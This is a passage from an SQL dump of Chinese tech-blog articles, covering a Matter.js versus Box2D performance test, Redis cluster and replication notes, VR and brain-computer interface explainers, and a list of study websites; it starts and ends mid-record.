\n\n\n\n2019年不是颠覆性的一年,但是新技术会不断出现,「安于现状」是移动端程序员的大忌。每年苹果、Google、Facebook等全球互联网公司推出的新技术一定要关注,对于底层知识架构需要不断加深。此外,在本行业深耕细作的基础上,要不断扩展自身的技术栈,对于行业知识进行深入了解。除了阅读书籍,还可以通过老司机iOS周报、SwiftGG翻译组、业界大牛的博客等途径获取相关的学习方法和内容。\n\n「2019年会是过去十年中差的一年,却是未来十年中好的一年。」这是最近流行于网络的一个段子。但是在移动端的球场上,即使比赛会越来越艰难,但是下半场的哨声已经响起,继续踢下去的「勇士」才可能赢得胜利。\n\n2019年移动端下半场,你准备好上场了吗?\n\n(为保护采访对象隐私,本文中的郭昌、晓东、杨辉均为化名) \n\n来源:网络整理 编辑:IT独行侠',1,0,NULL,0,0,'2019-01-21 14:29:17','2020-08-19 09:24:18',13,NULL,NULL,'',0,NULL,1,'2019-01-21 14:29:17',0,0,0,NULL,1,1,NULL,8,0),(180,NULL,'JavaScript物理引擎之Matter.js与Box2d性能对比','##前言\n\n在挑选JavaScript 2D物理引擎的时候,不外乎两种主流的选择:第一种是老牌的Box2D,最开始的版本是C++实现的,后来有了很多种实现,比如flash版本和js版本,具体可看:https://stackoverflow.com/que...;第二种是新潮的matter-js,matter-js比较轻量,API和文档都比较有友好。\n\n这段时间先后折腾了matter-js和Box2D,因为项目需要在微信小游戏端运行,对性能要求比较高,最终还是选择了Box2D。\n\n但凡涉及到这种需要经常看源码才能使用的库中文社区都非常少干货,这段时间折腾之后打算整理一些文章,分享给社区也作为一个知识备忘。\n\n本文简单对两个引擎的性能在不同平台上进行对比,其中Box2D采用的是TypeScript实现的版本:https://github.com/flyover/bo..., 作者仍然在更新,并且我看了下CocosCreator内置的物理引擎也是基于这个进行的封装,社区还是可以得到保证的。matter-js采用的是0.14.2版本(感觉作者已经更新不动这个库了:),大半年都不怎么活跃了)。\n\n##测试案例\n\n在屏幕随机位置重复创建相同的矩形刚体,使之自由落体到底部,计算不同刚体数量下,全部刚体落地后每一帧的物理计算平均耗时。下面是测试中的一些截图:\n\n\n\n\n\n##影响性能的因素\n\n- 机器本身的配置;\n- JIT:苹果端微信小游戏没有JIT,性能会大打折扣;\n- 刚体的随机性:刚体在随机位置生成的过程中,如果与其他刚体重叠,物理引擎需要更多的性能消耗来修正重叠,因此,每次运行测试用例数据上都不可避免会有波动。\n- 引擎本身的设计:比如matter-js没有圆形的定义,创建圆形刚体本质上是创建25边形,而Box2d天然就设计了圆形刚体,所以对于圆形刚体,两个引擎会存在不小的差异。\n\n##数据采集\n\n因为是测试物理引擎的性能,这里不考虑FPS,只采集物理引擎更新每一帧的时间,因为除开物理引擎,渲染引擎(PixiJS)也会带来性能消耗。\n\n```asp\n// Box2d数据打点\nlet positionIterations = 3;\nlet velocityIterations = 8;\nlet timeStep = 1 / 60;\nPerformance.startPoint(\'box2dUpdateCost\');\nworld.Step(timeStep, velocityIterations, positionIterations);\nPerformance.endPoint(\'box2dUpdateCost\');\n\n// matter-js数据打点\nPerformance.startPoint(\'matterUpdateCost\');\nmatter.Engine.update(this.engine, 1e3 / this.fps);\nPerformance.endPoint(\'matterUpdateCost\');\n\n// 计算平均耗时\nfunction calAverage(list, key) {\n let sum = list.reduce((total, curr) => curr[key] + total, 0);\n console.log(sum / list.length)\n}\n\n// 所有数据会收集到一个数组里面\nlet data = Performance.print();\n\n//calAverage(data, \'matterUpdateCost\');\ncalAverage(data, \'box2dUpdateCost\');\n```\n\n##结论\n\n在PC端,Box2d全面战胜了matter-js,在苹果的微信小游戏端,因为没有JIT,Box2d性能反而不如matter-js,而回到安卓的微信小游戏端,因为有JIT,Box2d同样是可以战胜matter-js的。\n\n\n',1,0,NULL,0,0,'2019-01-21 16:45:44','2020-08-09 21:45:49',25,NULL,NULL,'',0,NULL,1,'2019-01-21 16:45:44',0,0,0,NULL,1,1,NULL,10,0),(183,NULL,'Redis中集群概念讲解','\n\nCluster\n\n1、Redis 集群的分片特征在于将键空间分拆了16384个槽位,每一个节点负责其中一些槽位\n\n2、Redis提供一定程度的可用性,可以在某个节点宕机或者不可达的情况下继续处理命令.\n\n3、Redis 集群中不存在中心(central)节点或者代理(proxy)节点\n\n \n\n- 集群的最大节点数量也是 16384 个(推荐的最大节点数量为 1000 个),同理每个主节点可以负责处理1到16384个槽位。\n\n- 集群中的每个节点都与其他节点建立起了“集群连接(cluster bus)”, 该连接是一个 TCP 连接, 使用二进制协议进行通讯。\n\n \n\n节点之间使用 Gossip 协议 来进行以下工作:\n\n- a).传播(propagate)关于集群的信息,以此来发现新的节点。\n\n- b).向其他节点发送 PING 数据包,以此来检查目标节点是否正常运作。\n\n- c).在特定事件发生时,发送集群信息。\n\n \n\nHASH_SLOT = CRC16(key) mod 16384\n\n \n\n目前redis支持的cluster特性\n\n2. 节点自动发现\n\n4. slave->master 选举,集群容错\n\n6. Hot resharding:在线分片\n\n8. 进群管理:cluster xxx\n\n10. 基于配置(nodes-port.conf)的集群管理\n\n12. ASK 转向/MOVED 转向机制.\n\n \n\n \n\nMaster/Slave\n\n \n\n \n\n1.Redis的复制功能没有增量复制,每次重连都会把主库整个内存快照发给从库,所以需要避免向在线服务的压力较大的主库上增加从库。\n\n \n\n2.Redis的复制由于会使用快照持久化方式,所以如果你的Redis持久化方式选择的是日志追加方式(aof),那么系统有可能在同一时刻既做aof日志文件的同步刷写磁盘,又做快照写磁盘操作,这个时候Redis的响应能力会受到影响。所以如果选用aof持久化,则加从库需要更加谨慎。\n\n \n\n####特点和优势\n\n1. 同一个Master可以同步多个Slaves。\n2. Slave同样可以接受其它Slaves的连接和同步请求,这样可以有效的分载Master的同步压力。因此我们可以将Redis的Replication架构视为图结构。\n3. Master Server是以非阻塞的方式为Slaves提供服务。所以在Master-Slave同步期间,客户端仍然可以提交查询或修改请求。\n4. Slave Server同样是以非阻塞的方式完成数据同步。在同步期间,如果有客户端提交查询请求,Redis则返回同步之前的数据。\n5. 为了分载Master的读操作压力,Slave服务器可以为客户端提供只读操作的服务,写服务仍然必须由Master来完成。即便如此,系统的伸缩性还是得到了很大的提高。\n6. Master可以将数据保存操作交给Slaves完成,从而避免了在Master中要有独立的进程来完成此操作。\n \n\n###工作原理 \n\n在Slave启动并连接到Master之后,它将主动发送一个SYNC命令。此后Master将启动后台存盘进程,同时收集所有接收到的用于修改数据集的命令,在后台进程执行完毕后,Master将传送整个数据库文件到Slave,以完成一次完全同步。而Slave服务器在接收到数据库文件数据之后将其存盘并加载到内存中。此后,Master继续将所有已经收集到的修改命令,和新的修改命令依次传送给Slaves,Slave将在本次执行这些数据修改命令,从而达到最终的数据同步。\n 如果Master和Slave之间的链接出现断连现象,Slave可以自动重连Master,但是在连接成功之后,一次完全同步将被自动执行。\n',1,0,NULL,0,0,'2019-01-21 17:45:45','2020-08-19 09:24:18',160,NULL,NULL,'',0,NULL,1,'2019-01-21 17:45:45',0,3,0,'2020-08-18 09:23:10',1,1,NULL,21,0),(230,NULL,'虚拟现实技术科普',' 虚拟现实技术(英文名称:Virtual Reality,缩写为VR),又称灵境技术,是20世纪发展起来的一项全新的实用技术。虚拟现实技术囊括计算机、电子信息、仿真技术于一体,其基本实现方式是计算机模拟虚拟环境从而给人以环境沉浸感。随着社会生产力和科学技术的不断发展,各行各业对VR技术的需求日益旺盛。VR技术也取得了巨大进步,并逐步成为一个新的科学技术领域。\n**简介**\n 所谓虚拟现实,顾名思义,就是虚拟和现实相互结合。从理论上来讲,虚拟现实技术(VR)是一种可以创建和体验虚拟世界的计算机仿真系统,它利用计算机生成一种模拟环境,使用户沉浸到该环境中。虚拟现实技术就是利用现实生活中的数据,通过计算机技术产生的电子信号,将其与各种输出设备结合使其转化为能够让人们感受到的现象,这些现象可以是现实中真真切切的物体,也可以是我们肉眼所看不到的物质,通过三维模型表现出来。因为这些现象不是我们直接所能看到的,而是通过计算机技术模拟出来的现实中的世界,故称为虚拟现实。 \n 虚拟现实技术受到了越来越多人的认可,用户可以在虚拟现实世界体验到最真实的感受,其模拟环境的真实性与现实世界难辨真假,让人有种身临其境的感觉;同时,虚拟现实具有一切人类所拥有的感知功能,比如听觉、视觉、触觉、味觉、嗅觉等感知系统;最后,它具有超强的仿真系统,真正实现了人机交互,使人在操作过程中,可以随意操作并且得到环境最真实的反馈。正是虚拟现实技术的存在性、多感知性、交互性等特征使它受到了许多人的喜爱。\n**分类**\n VR涉及学科众多,应用领域广泛,系统种类繁杂,这是由其研究对象、研究目标和应用需求决定的。从不同角度出发,可对VR系统做出不同分类。\n 1、根据沉浸式体验角度分类\n 沉浸式体验分为非交互式体验、人——虚拟环境交互式体验和群体——虚拟环境交互式体验等几类。该角度强调用户与设备的交互体验,相比之下,非交互式体验中的用户更为被动,所体验内容均为提前规划好的,即便允许用户在一定程度上引导场景数据的调度,也仍没有实质性交互行为,如场景漫游等,用户几乎全程无事可做;而在人——虚拟环境交互式体验系统中,用户则可用过诸如数据手套,数字手术刀等的设备与虚拟环境进行交互,如驾驶战斗机模拟器等,此时的用户可感知虚拟环境的变化,进而也就能产生在相应现实世界中可能产生的各种感受。\n 如果将该套系统网络化、多机化,使多个用户共享一套虚拟环境,便得到群体—虚拟环境交互式体验系统,如大型网络交互游戏等,此时的VR系统与真实世界无甚差异。\n 2、根据系统功能角度分类\n 系统功能分为规划设计、展示娱乐、训练演练等几类。规划设计系统可用于新设施的实验验证,可大幅缩短研发时长,降低设计成本,提高设计效率,城市排水、社区规划等领域均可使用,如VR模拟给排水系统,可大幅减少原本需用于实验验证的经费;展示娱乐类系统适用于提供给用户逼真的观赏体验,如数字博物馆,大型3D交互式游戏,影视制作等,如VR技术早在70年代便被Disney用于拍摄特效电影;训练演练类系统则可应用于各种危险环境及一些难以获得操作对象或实操成本极高的领域,如外科手术训练、空间站维修训练等。\n**特征**\n 1、沉浸性\n 沉浸性是虚拟现实技术最主要的特征,就是让用户成为并感受到自己是计算机系统所创造环境中的一部分,虚拟现实技术的沉浸性取决于用户的感知系统,当使用者感知到虚拟世界的刺激时,包括触觉、味觉、嗅觉、运动感知等,便会产生思维共鸣,造成心理沉浸,感觉如同进入真实世界。 [5] \n 2、交互性\n 交互性是指用户对模拟环境内物体的可操作程度和从环境得到反馈的自然程度,使用者进入虚拟空间,相应的技术让使用者跟环境产生相互作用,当使用者进行某种操作时,周围的环境也会做出某种反应。如使用者接触到虚拟空间中的物体,那么使用者手上应该能够感受到,若使用者对物体有所动作,物体的位置和状态也应改变。\n 3、多感知性\n 多感知性表示计算机技术应该拥有很多感知方式,比如听觉,触觉、嗅觉等等。理想的虚拟现实技术应该具有一切人所具有的感知功能。由于相关技术,特别是传感技术的限制,目前大多数虚拟现实技术所具有的感知功能仅限于视觉、听觉、触觉、运动等几种。\n 4、构想性\n 构想性也称想象性,使用者在虚拟空间中,可以与周围物体进行互动,可以拓宽认知范围,创造客观世界不存在的场景或不可能发生的环境。构想可以理解为使用者进入虚拟空间,根据自己的感觉与认知能力吸收知识,发散拓宽思维,创立新的概念和环境。\n 5、自主性\n 是指虚拟环境中物体依据物理定律动作的程度。如当受到力的推动时,物体会向力的方向移动、或翻倒、或从桌面落到地面等。\n**关键技术**\n 虚拟现实的关键技术主要包括:\n 1、动态环境建模技术\n 虚拟环境的建立是VR系统的核心内容,目的就是获取实际环境的三维数据,并根据应用的需要建立相应的虚拟环境模型。 [6] \n 2、实时三维图形生成技术\n 三维图形的生成技术已经较为成熟,那么关键就是“实时”生成。为保证实时,至少保证图形的刷新频率不低于15帧/秒,最好高于30帧/秒。\n 3、立体显示和传感器技术\n 虚拟现实的交互能力依赖于立体显示和传感器技术的发展,现有的设备不能满足需要,力学和触觉传感装置的研究也有待进一步深入,虚拟现实设备的跟踪精度和跟踪范围也有待提高。\n 4、应用系统开发工具\n 虚拟现实应用的关键是寻找合适的场合和对象,选择适当的应用对象可以大幅度提高生产效率,减轻劳动强度,提高产品质量。想要达到这一目的,则需要研究虚拟现实的开发工具。\n 5、系统集成技术\n 由于VR系统中包括大量的感知信息和模型,因此系统集成技术起着至关重要的作用,集成技术包括信息的同步技术、模型的标定技术、数据转换技术、数据管理模型、识别与合成技术等。\n**技术应用**\n 1、在影视娱乐中的应用\n 近年来,由于虚拟现实技术在影视业的广泛应用,以虚拟现实技术为主而建立的第一现场9DVR体验馆得以实现。第一现场9DVR体验馆自建成以来,在影视娱乐市场中的影响力非常大,此体验馆可以让观影者体会到置身于真实场景之中的感觉,让体验者沉浸在影片所创造的虚拟环境之中。同时,随着虚拟现实技术的不断创新,此技术在游戏领域也得到了快速发展。虚拟现实技术是利用电脑产生的三维虚拟空间,而三维游戏刚好是建立在此技术之上的,三维游戏几乎包含了虚拟现实的全部技术,使得游戏在保持实时性和交互性的同时,也大幅提升了游戏的真实感。\n 2、在教育中的应用\n 如今,虚拟现实技术已经成为促进教育发展的一种新型教育手段。传统的教育只是一味的给学生灌输知识,而现在利用虚拟现实技术可以帮助学生打造生动、逼真的学习环境,使学生通过真实感受来增强记忆,相比于被动性灌输,利用虚拟现实技术来进行自主学习更容易让学生接受,这种方式更容易激发学生的学习兴趣。此外,各大院校利用虚拟现实技术还建立了与学科相关的虚拟实验室来帮助学生更好的学习。\n 3、在设计领域的应用\n 虚拟现实技术在设计领域小有成就,例如室内设计,人们可以利用虚拟现实技术把室内结构、房屋外形通过虚拟技术表现出来,使之变成可以看的见的物体和环境。同时,在设计初期,设计师可以将自己的想法通过虚拟现实技术模拟出来,可以在虚拟环境中预先看到室内的实际效果,这样既节省了时间,又降低了成本。\n 4、虚拟现实在医学方面的应用\n 医学专家们利用计算机,在虚拟空间中模拟出人体组织和器官,让学生在其中进行模拟操作,并且能让学生感受到手术刀切入人体肌肉组织、触碰到骨头的感觉,使学生能够更快的掌握手术要领。而且,主刀医生们在手术前,也可以建立一个病人身体的虚拟模型,在虚拟空间中先进行一次手术预演,这样能够大大提高手术的成功率,让更多的病人得以痊愈。\n 5、虚拟现实在军事方面的应用\n 由于虚拟现实的立体感和真实感,在军事方面,人们将地图上的山川地貌、海洋湖泊等数据通过计算机进行编写,利用虚拟现实技术,能将原本平面的地图变成一幅三维立体的地形图,再通过全息技术将其投影出来,这更有助于进行军事演习等训练,提高我国的综合国力。 [7] \n除此之外,现在的战争是信息化战争,战争机器都朝着自动化方向发展,无人机便是信息化战争的最典型产物。无人机由于它的自动化以及便利性深受各国喜爱,在战士训练期间,可以利用虚拟现实技术去模拟无人机的飞行、射击等工作模式。战争期间,军人也可以通过眼镜、头盔等机器操控无人机进行侦察和暗杀任务,减小战争中军人的伤亡率。由于虚拟现实技术能将无人机拍摄到的场景立体化,降低操作难度,提高侦查效率,所以无人机和虚拟现实技术的发展刻不容缓。\n 6、虚拟现实在航空航天方面的应用\n 由于航空航天是一项耗资巨大,非常繁琐的工程,所以,人们利用虚拟现实技术和计算机的统计模拟,在虚拟空间中重现了现实中的航天飞机与飞行环境,使飞行员在虚拟空间中进行飞行训练和实验操作,极大地降低了实验经费和实验的危险系数。\n**发展局限**\n 即使VR技术前景较为广阔,但作为一项高速发展的科技技术,其自身的问题也随之渐渐浮现,例如产品回报稳定性的问题、用户视觉体验问题等。对于VR企业而言,如何突破目前VR发展的瓶颈,让VR技术成为主流仍是他们所亟待解决的问题。\n 首先,部分用户使用VR设备会带来眩晕、呕吐等不适之感,这也造成其体验不佳的问题。部分原因来自清晰度的不足,而另一部分来自刷新率无法满足要求。据研究显示,14k以上的分辨率才能基本使大脑认同,但就目前来看,国内所用的VR设备远不及骗过大脑的要求。消费者的不舒适感可能产生的其对VR技术是否会对自身身体健康造成损害的担忧,这必将影响VR技术未来的发展与普及。\n VR体验的高价位同样是制约了其扩张的原因之一。在国内市场中,VR眼镜价位一般都在三千元以上。当然这并非是短时间内可以解决的问题,用户如果想体验到高端的视觉享受,必然要为其内部更高端的电脑支付高昂的价格。若想要使得虚拟现实技术得到推广,确保其内容的产出和回报率的稳定十分关键。其所涉及内容的制作成本与体验感决定了消费者接受VR设备的程度,而对于该高成本的内容,其回报率难以预估。其中对VR原创内容的创作无疑加大了其中的难度。',50,0,NULL,0,0,'2019-08-15 15:01:00','2020-08-19 09:24:18',27,NULL,NULL,'',0,NULL,1,'2020-08-18 08:56:57',0,1,0,NULL,1,1,NULL,10,0),(232,NULL,'脑机接口,改变下一代人机交互方式?','最近脑机接口很热。先是马斯克投资的神经科学公司Neuralink公司宣布其“像缝纫机一样”的机器人,随后Facebook一直支持的加州大学旧金山分校团队(UCSF)在《自然-通讯》上发表论文,公布他们已建成一个脑机接口。这一系列脑机接口成果密集曝光,是巧合还是必然?在PC之于键盘鼠标、移动之于触控之后,业界一直在寻找下一代计算平台的主流人机交互方式,脑机接口会是“那一个”吗?下一代的人机交互方式应该具备什么特征?\n\n**脑机接口处于雏形阶段**\n\n我们先来看这两次的脑机接口突破的成果。Neuralink用“像缝纫机一样”的机器人,将超纤细的线植入大脑深处,能够读写大脑信息。Facebook支持的加州大学旧金山分校团队(UCSF)神经外科医生Edward Chang公布其脑机接口的进展,通过一个脑机接口,能够实时地从大脑信号中解码对话,该系统能够解码感知(听到)和产生(说出)的语音,准确率分别达到76%和61%。从Edward Chang给出的预期看,这种神经植入物可用于恢复因中风、脊髓损伤或其他疾病而失去说话能力的患者的自然交流。\n\n此前有报道信息称Facebook的UCSF项目相比Neuralink最大的不同,是该项目为非植入式脑机接口,非植入就意味着无须在大脑上打孔,无论是从操作性和安全性来看,都比Neuralink大大进了一步。\n\n但中科院自动化所模式识别国家重点实验室副主任、脑网络组北京市重点实验室副主任余山在接受《中国电子报》记者采访时说,Neuralink和UCSF的研究成果都属于植入式脑机接口。FUCSF这项研究中,用的是颅内脑电的数据,也就是开颅手术之后,放置于癫痫病人皮层上面脑电所记录的数据。所以这个不能算是“非植入式脑机解码”。用这样的方法,只能在特定的患者身上开展。所以要想实现接近准确率100%会非常难,因为颅内脑电的数据分辨率还不是很高,难以区分单个细胞的活动。\n\n而Facebook的目标是非植入脑机接口。在2017年举行的F8大会上,Facebook曾宣布了脑机接口(BCI)计划,概述了构建非侵入性可穿戴设备的目标,该设备能让人们通过默想自己说的话来打字,而UCSF是BCI计划的一部分。BCI计划的真正意图不完全是医疗用途,他们的目标是为VR/AR寻找输入方式。Mark Cheville是Facebook现实实验室脑机接口项目的研究主管,他表示,BCI项目以开发增强现实眼镜为最终目标,这种眼镜无需大声说话就可以实现控制。Facebook表示,这种完全无创的脑机系统最终可以让人们每分钟输入100个单词(是现在人们用手机输入单词速度的5倍)。\n\n0glass公司创始人苏波在接受《中国电子报》记者采访时表示,Facebook非侵入式可穿戴设备和马斯克的植入式设备异曲同工,都是读取脑电图,最终达到控制输入和交互目的。“我的判断,目前这种设备还处于早期雏形阶段,还存在体积大、操作复杂、辨识率不高或能设计的交互流程有限等问题,但却代表了未来。”苏波说。\n\n**对人脑的认知是关键**\n\n脑机接口能够成为继鼠标键盘、触控系统之后的第三个主流的人机交互系统吗?这应该是脑机接口之所以被极大关注的根本原因。\n\n如果脑机接口成为主流的人机交互系统,需要在两个维度获得更大突破:一是“接入式”脑机接口要足够安全、足够方便。二是“非植入式”脑机接口的解码率要足够高。从目前看,70%的解码率显然不够,那么它能够实现100%的解码率吗?\n\n赣鄱基因创始人兼CEO殷伟荣对《中国电子报》记者表示:“第一,UCSF这个项目准确率怎么计算的尚不知道;第二,我认为解码率提高是可能的,但能不能无限接近99.99%及其以上,需要时间和科研积累。难度在于,现在对于人脑的认识,有可能连1%都不到。”\n\n中科院自动化研究所研究员何晖光在接受《中国电子报》记者采访时表示,目前植入式脑机接口主要应用在病人或者动物上;非植入式脑机接口尽管其精度没有植入式高,但是也有一些发挥了重要的作用。如清华大学脑机接口研究组利用视觉诱发电位脑机接口帮助渐冻人朗读和交流;华南理工大学利用脑机接口对植物人的状态进行评估;美国CMU团队利用运动想象遥控无人机,还利用运动想象促进中风病人上肢康复。\n\n何晖光进一步表示,由于对大脑工作机制了解不足,并且受到神经信号采集和分析手段的限制,现有脑机交互技术的信息传输速率(0.1比特/秒~5比特/秒)仍远低于键盘和语音等传统的人机交互方法,无法得到广泛应用。所以他的结论是,脑机接口无法成为AR/VR时代的主流机交互方式。\n\n苏波认为,目前脑机接口技术尚未成熟,无法担当AR/VR主流人机交互的重任。\n\n**交互方式将会混合存在**\n\n如果现在的脑机接口技术尚不成熟,还无法承载AR/VR主流交互方式的重任,那么谁是担当下一代计算重任的“那一个”呢?\n\n苏波认为,每一代计算平台(终端)的革命都伴随着交互技术的革命,而交互技术的革命也会引发计算终端操作系统的革命,也可以说交互技术是计算平台之所以成为计算平台最重要的因素之一。鼠标的发明,催生了图文界面的操作系统MacOS和Windows,键盘作为输入工具和鼠标完美结合,从而带来PC时代。而触控技术与安卓、iOS联手,催生了第二代计算平台智能手机时代。有观点是,AR/VR有望成为下一代计算平台,那么AR/VR眼镜要想成为个人消费品还要满足四个条件:第一,轻量化和微型化;第二,5G网络的正式商用;第三,新一代AR操作系统的发明;第四,新一代交互技术的产生。\n\nAR/VR个人消费时代的到来,其中的关键点包括了适合AR/VR的新一代的交互技术及新一代的操作系统。苏波认为新一代的操作系统会从现在的AR SDK慢慢演变而来。未来,AR最主要、最自然的交互方式一定是脑波交互,不影响他人又能很好地保护隐私。但是目前脑波交互刚刚萌芽,离成熟还有相当长的时间。在此之前必须打通脑机接口,而如何打通,现在已经看到了希望。\n\n“我的判断,脑波交互需要至少十年时间才能真正用于交互。在这十来年的期间内,还有没有更好的交互方式能用于AR眼镜?在脑波交互到来之前,键盘、手柄、鼠标(指环)、语音、手势、眼动这六种交互方式将会混合存在,并且2020年之前一定会发明一种可以让这6种交互方式自由按需切换的技术或平台。”苏波说。\n\n何晖光认为,在AR/VR时代,尽管人机交互会取得很大进展,但脑机交互应该还不会成为主流交互系统。下一代交互系统应该是多模态智能人机交互,将使用人工智能技术,通过多种模态的信号实现人与机器的交互,其最终目标是使人机交互像人人交互一样便捷和自然。\n\n在这意义上看,苏波和何晖光都认为至少相当长的时间内脑机接口还不可能成为AR/VR的主流交互方式,混合、多模态智能人机交互才会是接下来的主流形态,而未来的终极目标是脑波交互。但它何时到来,尚无时间表。',50,1,NULL,0,0,'2019-08-15 15:25:33','2020-08-21 10:10:02',93,NULL,NULL,'',0,NULL,1,'2020-08-18 08:56:56',0,0,1,'2020-08-21 10:10:02',1,1,NULL,12,0),(233,NULL,'分享学习网站','分享一些有用的信息!!!\n\n搜索引擎:机器:谷粉搜搜,谷歌,百度\n人工:雅虎,AskJeeves,DMOZ\n\ncreative Common Search(合法免费信息),The Inteernet Movie Database (IMD),cheapAir.com(机票)\n\n元搜索引擎:WebCrawwier,ALL4One(来自不同的搜索引擎)\n\nKidRex(面向小孩),SAFE SEARCH KIDS,搜搜儿童搜索,小番薯搜索引擎,少儿、儿童 网站大全,儿童歌曲、儿童动画片视频\n\n学术搜索:百度学术,CNKI,读秀,e读(eduChina ) Academic,CiteSeer,BASE,Web of science,sci_hub\n\n免费专利检索:WIPO,YSPTO,ESPATENET(欧洲),NSTL,uspto(中\n\n国),freepatentonline,soopat,国家知识产权局,中国专利信息网,欧洲专利局,美国专利\n\n商标局,世界知识产权组织,IBM专利数据库\n\n商标检索:Dialog,lagalforce,iprtech,中国商标网,INTA,USPTO\n\n商标搜索引擎:Markifu(世界范围)\n\n学位论文检索:CALIS学位论文中心服务系统,万方中国学位论文数据库\n\n(CDDB),中国知网的硕士与博士学位论文数据库,NSTL学位论文,国家图书馆博士\n\n论文数据库,中国科学院学位论文检索系统,eThesys分布式学位论文共建共享计划,中\n\n文电子学位论文服务,台湾地区的博硕士论文资讯网\n\n国外:ProQuest学位论文全文数据库,网络化的博硕士论文数字图书馆(NDLTD)\n\n会议和会议信息检索:中国知网,万方数据,engineering village,firstSearch,ACMDL\n\nDIGITAL LIBRARY,SIG,中国学术在线,IEL(Http://ieeexplore.ieee.org),PNAS\n\n会议检索:open中国大学讲座,COMS\n\n电子书下载与分享:爱搜书,Ebookee,ebook search(英文资源),爱问共享资源,电驴大全,豆瓣, kindle电子书论坛,读远,鸠摩搜索(文档下载)\n\n在线学习:网易公开课,新浪公开课,硅谷动力网络学院、我国著名MOOC平台学堂在线:中国大学MOOC;MOOC三大平台:Coursera,edX,udacity(侧重计算机)\n\n期刊搜索:读秀中文,science Direct,RSS阅读器\n\n文献翻译:Free Traslation world Lingo ,Google翻译\n\n搜特定格式文件:SOPDF,PPT Finder\n\n格式(PDF,WORD,MP3)转换:格式工厂\n\n电子笔记:涂书笔记,印象笔记,为知笔记\n\n多人协同编辑同一文档:格子云\n\n自学网站:简书,知乎,慕课,实验楼,腾讯课堂,网易云课堂,极客学院,百度传课,我要自学网\n\n',50,0,NULL,0,0,'2019-08-15 15:33:19','2020-10-13 14:14:26',15,NULL,NULL,'',0,NULL,1,'2020-08-18 08:56:55',0,0,0,'2020-10-13 14:14:26',1,1,NULL,35,0),(234,NULL,'浅谈虚拟现实如何改变世界','想象家人与朋友彼此身处世界的不同角落,却能相聚在同一房间的场景。这听起来像是科幻电影片段,但很多人没有意识到这是一个现实。\n\n这就是虚拟现实。\n很多人认为虚拟现实只是一个白日梦也是可以理解的。其实虚拟现实自1950年就一直存在,只是当时有许多关于虚拟现实开发失败告终,如游戏领域的Sega和Nintendo。\n\nNintendo(任天堂)最初于1995年发布“虚拟男孩”,仅上线了22款游戏后于第二年的三月份停止该项目,此次成为Nintendo发展史中最大的败笔。\n\n当时Nintendo是电子游戏的领军巨头,经历“虚拟男孩”失败后,放弃虚拟现实投资很长一段时间。\n\n经历14年后,另一个进军虚拟现实的商业可行性契机出现。\n\nPalmer Lucky的时代来临。\n2010年Palmer Lucky设计出第一个Oculus Rift原型,打开虚拟现实新大门。\n\n2014年索尼宣布正在开发Project Morpheus(目前的PlayStation VR), 基于PlayStation 4控制台的虚拟现实头显。同时,谷歌发布Cardboard,为智能手机打造的自制立体眼镜。\n\n虚拟现实最重大事件是2014年3月25日,扎克伯格以20亿美元收购Oculus VR\n虽然目前为止电子游戏推动了VR热潮,但被Facebook收购后的Oculus Rift不仅有雄厚的资本保证其质量,而且可能会开辟了虚拟现实新天地。\n\n索尼、HTC和被收购前的Oculus似乎主要集中在虚拟现实将如何彻底改变游戏。对于游戏玩家来说感到无比兴奋,尤其是头显发布的那一年,但是对于社会的作用是应是如何改变世界。\n\n正如本文开始讲述的场景,身处不同地方的人可以聚在一起。\n\n想象一个世界:儿子或女儿住在伦敦且配戴好Oculus Rift或PlayStation VR,呼叫他们的远在墨尔本的父母,在客厅相聚。\n\n目前已有应用程序支持视频聊天如FaceTime和Skype。\n\n然而,视频聊天仍然较为客观,但我们可通过VR能真实感受到其他人也在相同的房间。此技术也打开旅行与探索世界的新方式。正如喜欢旅行的人们,不可能探索世界的每个角落。 \n我们可以等待几年后VR旅游企业的出现,只需在室内就可以去世界的每个地方。\n\n可以欣赏Mariana Trench海景或者去珠穆朗玛峰顶端旅行。\n\n更不用说VR为残疾人带来便利。同样,虚拟现实也为体育爱好者带来福音。例如:生活在Queensland的Hawthorn支持者仅能观看一年一次的球队比赛吗?\n\n只需Hawthorn销售“虚拟现实会员”,支持者便可在家中体验比赛的乐趣。\n\n像NBA的Los Angeles团队销售本赛季的每一场比赛,这意味着成千上万的球迷会观看,只是身体没有到达现场。\n\nVR也是把双刃剑,同时也会带来消极的一面。配戴虚拟现实头显需要用到所有的感官,特别是视觉与听觉。VR的本质是将你传送到另一个世界,反作用就是会让自己在现实世界中极度脆弱。\n\n权衡消极的一面,积极一面更胜一筹。\n\n至少它给我们提供了无尽的内容且带来乐趣。\n--------------------- \n版权声明:本文为CSDN博主「csdn屠敏」的原创文章,遵循CC 4.0 by-sa版权协议,转载请附上原文出处链接及本声明。\n原文链接:https://blog.csdn.net/sinat_14921509/article/details/80123455',50,0,NULL,0,0,'2019-08-15 15:43:19','2020-08-18 08:56:54',10,NULL,NULL,'',0,NULL,1,'2020-08-18 08:56:54',0,0,0,NULL,1,1,NULL,10,0),(235,NULL,'从7个维度浅析虚拟现实Alpha年','摘要:经过Oculus对市场的一番教育后,虚拟现实迎来了Alpha年。大家此前多是关注硬件,现在慢慢开始思考平台、内容与系统支持等问题。作者王元是在美国从事软件开发的工程师,他从7个维度浅析了他眼中虚拟现实目前的发展。\n前面我给大家介绍了不少VR技术和VR设备(往期回顾),但是说到底,有了优秀的硬件,要有好内容才能激发市场购买的欲望。今天我就给大家带来了VR产业链的分析,向大家解释为什么说2015是虚拟现实Alpha年。\n\n硬件\n被设计用来面向Hardcore Gamer的Oculus,倚仗着游戏PC的强大计算能力,将VR产品引入了消费者的视野。各大游戏内容和游戏硬件厂商,像Sony,Valve和Razor都迅速的推出了自己基于PC的VR产品。微软雄心勃勃的展示了结合AR的Hololens概念机,整合Windows 10平台和全套开发环境,决心打造VR产业生态标准。谷歌推出廉价的、用来推广VR概念的CardBoard,也斥资5亿美元领投了AR公司Magic Leap。\n\n再看移动端,三星抢先进驻移动VR领域,让更多的消费者了解到了VR产品并不是那么触不可及,进一步推广了VR概念。Oculus很快就宣布了进军移动VR的计划,Valve找来了制作手机的HTC来生产自家的Vive,不禁让人对其用意浮想联翩,硅谷的创业公司uSens推出的结合了手势操作系统的移动VR产品在今年的GDC展会和KickStarter上也受到了非常多的关注。\n\n经历了智能手机和移动互联网的爆炸性增长,进入增长放缓、利润下降的阶段后,大家无一例外的认为移动VR就是下一个技术爆点。Hardcore 